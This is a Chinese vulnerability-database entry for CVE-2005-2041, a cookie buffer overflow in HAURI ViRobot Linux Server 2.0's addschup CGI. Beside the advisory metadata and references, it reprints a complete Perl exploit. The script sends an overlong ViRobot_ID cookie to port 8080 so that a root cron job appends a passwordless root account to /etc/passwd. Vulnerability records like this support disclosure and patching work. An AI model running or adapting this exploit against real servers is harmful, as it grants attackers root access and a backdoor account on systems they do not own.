HAURI ViRobot ‘addschup’缓冲区溢出漏洞-安全小百科

HAURI ViRobot ‘addschup’缓冲区溢出漏洞

漏洞ID	1108857	漏洞类型	缓冲区溢出
发布时间	2005-06-14	更新时间	2005-06-15
CVE编号	CVE-2005-2041	CNNVD-ID	CNNVD-200506-132
漏洞平台	Linux	CVSS评分	5.0

|漏洞来源

https://www.exploit-db.com/exploits/1047
https://www.securityfocus.com/bid/89161
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200506-132

|漏洞详情

HAURIViRobot2.0，可能还包括其它产品的addschup中存在缓冲区溢出漏洞，远程攻击者可借助一个超长ViRobot_IDcookie(HTTP_COOKIE)来执行任意代码。

|漏洞EXP

#!/usr/bin/perl
# ViRobot 2.0 remote cookie exploit - ala addschup
# copyright Kevin Finisterre kf_lists[at]digitalmunition[dot]com
#
# jdam:/home/kfinisterre# ls -al /var/spool/cron/root
# ls: /var/spool/cron/root: No such file or directory
# jdam:/home/kfinisterre# ls -al /var/spool/cron/root
# -rw-r--r--  1 root staff 104 2005-01-23 14:43 /var/spool/cron/root
#
# We control the 6th paramater passed to an fprintf call.
#
# 0x804a740 <_IO_stdin_used+572>:  "%s %s %s %s %s %s/%s/vrupdate -s > /dev/null 2>&1n"
#
# * * * * * /bin/echo r00t::0:0:root:/root:/bin/bash >> /etc/passwd &/ViRobot/vrupdate -s > /dev/null 2>&1


use IO::Socket;
$hostName = $ARGV[0];

$sock = IO::Socket::INET->new (
               Proto => "tcp",
               PeerAddr => $hostName,
               PeerPort => 8080,
               Type => SOCK_STREAM
);

if (! $sock)
{
       print "[*] Error, could not connect to the remote host: $!n";
       exit (0);
}

$target = "/cgi-bin/addschup";
$crondata = "/bin/echo r00t::0:0:root:/root:/bin/bash >> /etc/passwd &";
$postbody = "POST $target HTTP/1.1n" .
"Host: localhost:8080n" .
"User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.3) Gecko/20041007 Debian/1.7.3-5n" .
"Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n" .
"Accept-Encoding: gzip,deflaten" .
"Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7n" .
"Keep-Alive: 300n" .
"Connection: keep-aliven" .
"Content-type: application/x-www-form-urlencodedn" .
"Content-length: 1n" .
"Cookie: ViRobot_ID=" . "A" x 32 . "$crondatan";

print $sock $postbody;
close ($sock);
exit (0);

# milw0rm.com [2005-06-14]

|受影响的产品

Hauri ViRobot Linux Server 2.0

|参考资料

来源:MISC
链接:http://www.securiteam.com/exploits/5TP0C1FG1I.html
来源:MISC
链接:http://www.digitalmunition.com/DMA%5B2005-0614a%5D.txt
来源:SECUNIA
名称:15700
链接:http://secunia.com/advisories/15700
来源:XF
名称:virobot-addschup-bo(21000)
链接:http://xforce.iss.net/xforce/xfdb/21000
来源:BID
名称:12964
链接:http://www.securityfocus.com/bid/12964
来源:OSVDB
名称:17320
链接:http://www.osvdb.org/17320
来源:www.globalhauri.com
链接:http://www.globalhauri.com/html/download/down_unixpatch.html
来源:FULLDISC
名称:20050615DMA[2005-0614a]-‘GlobalHauriViRobotServercookieoverflow’
链接:http://marc.theaimsgroup.com/?l=full-disclosure&m;=111880273631392&w;=2

相关推荐: Apache Server Address Disclosure Vulnerability

Apache Server Address Disclosure Vulnerability 漏洞ID 1103046 漏洞类型 Design Error 发布时间 2001-08-09 更新时间 2001-08-09 CVE编号 N/A CNNVD-ID N…

文章版权归作者所有，未经允许请勿转载。

THE END